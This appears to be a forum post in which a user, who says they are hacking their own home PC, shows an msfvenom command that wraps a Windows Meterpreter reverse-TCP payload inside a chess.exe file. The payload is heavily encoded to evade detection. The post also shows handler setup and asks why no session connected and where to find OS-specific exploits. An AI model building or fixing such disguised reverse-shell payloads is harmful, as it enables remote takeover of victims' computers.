So I am trying to hack my own computer just for fun. I am at work and my computer is on my home network, so I am assuming anywhere LHOST appears, I put my public IP and port 80 for LPORT?
So I created this exploit by doing :
msfvenom -p windows/meterpreter/reversetcp LHOST= 198.179.120.1xx LPORT=80 -x /usr/share/chess.exe -e x86/shikataganai -i 200 -f exe >chess.exe
I then started meterpreter on MSF by doing
use exploit/multi/handler
set payload windowsmeterpreter/reversetcp
I then email my home computer the file, hop in team viewer, open it on my home computer, but nothing on the meterpreter end happens, no connection established, etc. I try sessions -l and no active connections is all i get. Does that exploit only work on certain windows machines, no windows 10? IF so how would I of known that, and does a win 10 one exist?
Follow up question: Can we specify what exploit we want to use, somewhere , such as if we want to use
msf >use exploit/windows/fileformat/ms14017rtf
or is this different than the above? What I am still trying to find is a database where based on operating systems I can try different exploits, like specific ones for operating systems.
Thanks!
Comments
No Comments Exist
Be the first, drop a comment!